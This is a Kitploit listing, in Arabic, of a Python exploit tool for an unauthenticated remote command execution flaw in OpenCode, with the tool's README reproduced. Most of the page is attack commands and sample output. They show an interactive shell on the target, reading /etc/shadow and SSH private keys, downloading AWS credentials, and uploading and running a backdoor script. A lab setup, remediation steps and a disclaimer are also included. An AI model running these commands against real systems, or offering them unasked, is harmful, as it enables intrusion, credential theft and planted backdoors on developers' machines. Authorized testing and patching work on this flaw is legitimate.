Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-22812-exploit — أداة استغلال لثغرة CVE-2026-22812 (تنفيذ أوامر عن بُعد غير مصادق عليه في OpenCode) توفر غلافًا تفاعليًا، وتنفيذ أوامر عشوائية، ورفع/تنزيل الملفات، واستكشاف النظام لاختبارات الأمان المصرح بها. | Kitploit
أدوات/GitHubGitHub/rohmatariow/cve-2026-22812-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubrohmatariow/cve-2026-22812-exploit

CVE-2026-22812-exploit

أداة استغلال لثغرة CVE-2026-22812 (تنفيذ أوامر عن بُعد غير مصادق عليه في OpenCode) توفر غلافًا تفاعليًا، وتنفيذ أوامر عشوائية، ورفع/تنزيل الملفات، واستكشاف النظام لاختبارات الأمان المصرح بها.

عرض المستودع
336منذ 7 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أداة استغلال CVE-2026-22812

Python CVSS

مجموعة أدوات استغلال كاملة لـ CVE-2026-22812 - تنفيذ أوامر عن بُعد بدون مصادقة في OpenCode


🎯 نظرة عامة

أداة استغلال CVE-2026-22812 هي إطار عمل شامل لاستغلال ثغرة تنفيذ الأوامر عن بُعد بدون مصادقة في OpenCode. توفر هذه الأداة طرق استغلال متعددة تشمل الصدفة التفاعلية، وعمليات الملفات، وجمع معلومات النظام.

تفاصيل الثغرة

  • معرف CVE: CVE-2026-22812
  • الإصدار المتأثر: OpenCode < 1.0.216
  • درجة CVSS: 8.8 (عالية)
  • ناقل الهجوم: الشبكة
  • المصادقة: غير مطلوبة
  • الأثر: اختراق كامل للنظام

✨ الميزات

🔓 قدرات الاستغلال

  • ✅
إنشاء جلسة بدون مصادقة
  • ✅ تنفيذ أوامر عشوائية (RCE)
  • ✅ صدفة تفاعلية مع سجل الأوامر
  • ✅ رفع/تنزيل الملفات
  • ✅ قراءة ملفات عشوائية
  • ✅ إنشاء جلسة PTY
  • ✅ جمع معلومات النظام
  • ✅ دعم البروكسي (متوافق مع Burp Suite)

  • 📦 التثبيت

    المتطلبات الأساسية

    • Python 3.7+
    • pip
    • مكتبة requests

    التثبيت السريع

    root@kitploit:~
    # استنساخ المستودع
    git clone https://github.com/rohmatariow/CVE-2026-22812-exploit.git
    cd CVE-2026-22812-exploit
    
    # تثبيت التبعيات
    pip3 install -r requirements.txt
    

    التثبيت اليدوي

    root@kitploit:~
    pip3 install requests urllib3
    

    🚀 الاستخدام

    الاستغلال الأساسي

    1. التحقق من أن الهدف قابل للاستغلال

    root@kitploit:~
    python3 exploit.py -t http://192.168.1.10:4096 --verify
    

    المخرجات:

    root@kitploit:~
    [+] الهدف قابل للاستغلال ضد CVE-2026-22812!
    [+] معرف الجلسة: abc123def456
    

    2. تنفيذ أمر واحد

    root@kitploit:~
    python3 exploit.py -t http://192.168.1.10:4096 -c "id"
    

    المخرجات:

    root@kitploit:~
    [*] إنشاء جلسة...
    [+] تم إنشاء الجلسة: abc123def456
    [+] الهدف قابل للاستغلال!
    
    [*] التنفيذ: id
    [+] تم تنفيذ الأمر بنجاح
    
    uid=1000(developer) gid=1000(developer) groups=1000(developer)
    

    3. وضع الصدفة التفاعلية

    root@kitploit:~
    python3 exploit.py -t http://192.168.1.10:4096 -i
    

    الجلسة التفاعلية:

    root@kitploit:~
    [+] تم إنشاء الجلسة: abc123def456
    [+] الهدف قابل للاستغلال!
    
    [*] الدخول إلى وضع الصدفة التفاعلية
    [!] اكتب 'help' لعرض الأوامر، و'exit' للخروج
    
    developer@target$ whoami
    developer
    
    developer@target$ pwd
    /home/developer/workspace
    
    developer@target$ ls -la
    total 48
    drwxr-xr-x  8 developer developer 4096 Jan 16 10:30 .
    drwxr-xr-x  3 developer developer 4096 Jan 15 09:20 ..
    -rw-r--r--  1 developer developer  220 Jan 15 09:20 .bash_logout
    ...
    
    developer@target$ read /etc/hostname
    [*] قراءة الملف: /etc/hostname
    [+] تمت قراءة الملف بنجاح (10 بايت)
    dev-server-01
    
    developer@target$ exit
    [*] الخروج...
    

    📚 الاستخدام التفصيلي

    تنفيذ الأوامر

    root@kitploit:~
    # أمر واحد
    python3 exploit.py -t http://target:4096 -c "whoami"
    
    # أمر معقد
    python3 exploit.py -t http://target:4096 -c "ps aux | grep opencode"
    
    # أوامر متعددة
    python3 exploit.py -t http://target:4096 -c "cd /tmp && ls -la && pwd"
    

    عمليات الملفات

    قراءة الملفات

    root@kitploit:~
    # قراءة ملفات حساسة
    python3 exploit.py -t http://target:4096 -r /etc/passwd
    python3 exploit.py -t http://target:4096 -r /etc/shadow
    python3 exploit.py -t http://target:4096 -r ~/.ssh/id_rsa
    

    رفع الملفات

    root@kitploit:~
    # رفع سكربت شل
    python3 exploit.py -t http://target:4096 --upload shell.sh /tmp/shell.sh
    
    # رفع ملف ثنائي
    python3 exploit.py -t http://target:4096 --upload payload.elf /tmp/payload
    
    # رفع مع التنفيذ
    python3 exploit.py -t http://target:4096 --upload backdoor.sh /tmp/bd.sh
    python3 exploit.py -t http://target:4096 -c "chmod +x /tmp/bd.sh && /tmp/bd.sh"
    

    تنزيل الملفات

    root@kitploit:~
    # تنزيل ملف إعدادات
    python3 exploit.py -t http://target:4096 --download /etc/hosts ./hosts.txt
    
    # تنزيل بيانات الاعتماد
    python3 exploit.py -t http://target:4096 --download ~/.aws/credentials ./aws_creds.txt
    
    # تنزيل الكود المصدري
    python3 exploit.py -t http://target:4096 --download /app/config.json ./config.json
    

    جمع معلومات النظام

    root@kitploit:~
    # جمع معلومات النظام
    python3 exploit.py -t http://target:4096 --sysinfo
    

    المخرجات:

    root@kitploit:~
    {
      "hostname": "dev-server-01",
      "username": "developer",
      "user_id": "uid=1000(developer) gid=1000(developer)",
      "current_dir": "/home/developer/workspace",
      "kernel": "Linux dev-server-01 5.15.0-91-generic x86_64",
      "os_release": "Ubuntu 22.04.3 LTS",
      "ip_address": "192.168.1.10",
      "processes": "..."
    }
    

    المعالجة

    1. التحديث فورًا: npm install -g opencode-ai@latest
    2. إنهاء العمليات: pkill -f opencode
    3. فحص السجلات: مراجعة سجلات النظام بحثًا عن مؤشرات الاختراق
    4. تدوير بيانات الاعتماد: تغيير كلمات المرور ومفاتيح SSH
    5. تدقيق الأنظمة: التحقق من وجود أبواب خلفية

    🧪 إعداد مختبر الاختبار

    باستخدام Docker (موصى به)

    root@kitploit:~
    # Dockerfile لإصدار OpenCode القابل للاستغلال
    FROM node:18
    RUN npm install -g [email protected]
    EXPOSE 4096
    CMD ["opencode"]
    
    root@kitploit:~
    # البناء والتشغيل
    docker build -t opencode-vuln .
    docker run -p 4096:4096 opencode-vuln
    
    # اختبار الاستغلال
    python3 exploit.py -t http://localhost:4096 -i
    

    الإعداد اليدوي

    root@kitploit:~
    # تثبيت الإصدار القابل للاستغلال
    npm install -g [email protected]
    
    # تشغيل OpenCode
    opencode
    
    # في طرفية أخرى، تشغيل الاستغلال
    python3 exploit.py -t http://localhost:4096 --verify
    

    ⚠️ لا تنشر أبدًا الإصدارات القابلة للاستغلال في بيئة الإنتاج!


    📚 المراجع

    معلومات الثغرة

    • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-22812
    • GitHub Advisory: https://github.com/anomalyco/opencode/security/advisories/GHSA-vxw4-wv6m-9hhh
    • MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22812=

    ⚠️ إخلاء المسؤولية القانوني

    اقرأ بعناية

    هذه الأداة مقدمة لأغراض اختبار الأمان المصرح به فقط.

    ❌ الاستخدام المحظور

    • الوصول غير المصرح به إلى الأنظمة
    • الفحص دون إذن
    • أي أنشطة غير قانونية
    • الأغراض الخبيثة
    • أنظمة الإنتاج دون تصريح

    إشعار قانوني

    المؤلفون:

    • لا يتغاضون عن الاستخدام غير القانوني
    • غير مسؤولين عن سوء الاستخدام
    • لن يدعموا الأنشطة غير القانونية
    • لا يتحملون أي مسؤولية

    باستخدامك لهذه الأداة، فإنك توافق على:

    • الحصول على التصريح المناسب
    • الامتثال لجميع القوانين
    • تحمل المسؤولية الكاملة
    • الاستخدام الأخلاقي والمسؤول

    استخدم على مسؤوليتك الخاصة


    ⭐ امنح نجمة إذا كانت مفيدة! ⭐
    لأغراض اختبار الأمان المصرح به فقط

    تنزيل الأداة